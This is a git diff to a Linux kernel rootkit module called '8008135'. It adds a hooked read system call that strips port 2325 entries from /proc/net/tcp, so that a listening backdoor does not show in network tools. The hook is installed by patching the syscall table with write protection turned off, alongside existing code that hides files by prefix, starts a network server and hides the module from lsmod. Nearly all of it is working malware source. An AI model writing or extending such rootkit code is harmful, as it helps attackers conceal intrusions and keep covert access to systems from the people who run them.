diff --git a/src/8008135.c b/src/8008135.c
index b5460b6..2189d71 100644
--- a/src/8008135.c
+++ b/src/8008135.c
@@ -85,6 +85,72 @@ asmlinkage long sys_getdents_new(unsigned int fd,
 }
 
 
+/***  FUNCTION  ****************************************************************
+*          NAME:  hide port
+*   DESCRIPTION:  hides the port 2325 
+*    PARAMETERS:  -
+*       RETURNS:  
+*******************************************************************************/
+read_ptr orig_read;
+asmlinkage long hacked_read(unsigned int fd, char __user *buf,
+                            size_t count)
+{
+	long result, bp, diff_in_bytes;
+	char *kbuf, *start_line, *end_line, *port_num;
+	char *pathname, pbuf[256];
+	struct files_struct *current_files; 
+	struct fdtable *files_table;
+	struct path file_path;
+
+	// run real read 
+	result = (*orig_read)(fd,buf,count);
+	if (result <= 0)
+		return result;
+
+	// get pathname
+	// CITATION [8] from report
+	current_files = current->files;
+	files_table = files_fdtable(current_files);
+
+	file_path = files_table->fd[fd]->f_path;
+	pathname = d_path(&file_path,pbuf,256*sizeof(char));
+	// if virtual file /proc/net/tcp
+	if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
+		// copy from user to kernelspace;
+		if (!access_ok(VERIFY_READ,buf,result))
+			return -1;
+		if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
+			return -1;
+		if (copy_from_user(kbuf,buf,result))
+			return -1;
+
+		// filter out hidden ports
+		start_line = strchr(kbuf,':') - 4; // skip first line
+		diff_in_bytes = (start_line - kbuf) * sizeof(char);
+		for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
+			start_line = kbuf + bp;
+			port_num = strchr(strchr(start_line,':') + 1,':') + 1;
+			end_line = strchr(start_line,'\n');
+			diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
+			if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
+				memmove(start_line,end_line + 1, // delete line in file
+					result - bp - diff_in_bytes);
+				result -= diff_in_bytes;
+			}
+		}
+
+		// copy from kernel to userspace
+		if (!access_ok(VERIFY_WRITE,buf,result))
+			return EINVAL;
+		if (copy_to_user(buf,kbuf,result))
+			return EINVAL;
+		kfree(kbuf);
+	}
+	// return number of bytes read
+	return result;
+}
+
+
 /***  FUNCTION  ****************************************************************
 *          NAME:  hide_module
 *   DESCRIPTION:  hides the module from lsmod
@@ -115,13 +181,16 @@ static int __init init_8008135(void) {
 	
 	// add our new handlers
 	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
+	
+	orig_read = (read_ptr)sys_call_table[__NR_read];
+	
+	sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;
 
 	// turn write protect back on
 	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
 
 	printk(KERN_INFO "New syscall in place\n");
 	network_server_init();
-	
 	hide_module();
 	printk(KERN_INFO "Module hidden");
 	
@@ -140,6 +209,7 @@ static void __exit exit_8008135(void) {
 	write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
 	// set getdents handler back
 	sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
+	sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
 	// turn write protect back on
 	write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
 	printk(KERN_INFO "Old syscall back\n");
diff --git a/src/headers/8008135.h b/src/headers/8008135.h
index c81cdf3..0ff10ae 100644
--- a/src/headers/8008135.h
+++ b/src/headers/8008135.h
@@ -28,11 +28,20 @@
 #include <linux/fs.h>
 #include "5y563n.h"
 
+#include <linux/fdtable.h>
+#include <linux/net.h>
+#include <linux/seq_file.h>
+#include <linux/slab.h>
+#include <linux/socket.h>
+#include <linux/version.h>
+#include <net/tcp.h>
+#include <net/udp.h>
 
 /****  Defines *****************************************************************
 *******************************************************************************/
 
 #define GETDENTS_SYSCALL_NUM	78
+#define READ_SYSCALL_NUM		0
 #define WRITE_PROTECT_FLAG		(1<<16)
 
 #define HIDE_PREFIX				"8008135."
@@ -40,6 +49,7 @@
 
 #define MODULE_NAME				"8008135"
 #define MODULE_NAME_SZ			(sizeof(MODULE_NAME) - 1)
+#define HIDE_PORT "0915" // 2325 in Hexadecimal
 
 /****  Modinfo  ****************************************************************
 *******************************************************************************/
@@ -61,6 +71,6 @@ struct linux_dirent {
 typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
                                           struct linux_dirent __user *dirent,
                                           unsigned int count);
-
-
+typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf,
+                                    size_t count);
 #endif /* SRC_HEADERS_8008135_H */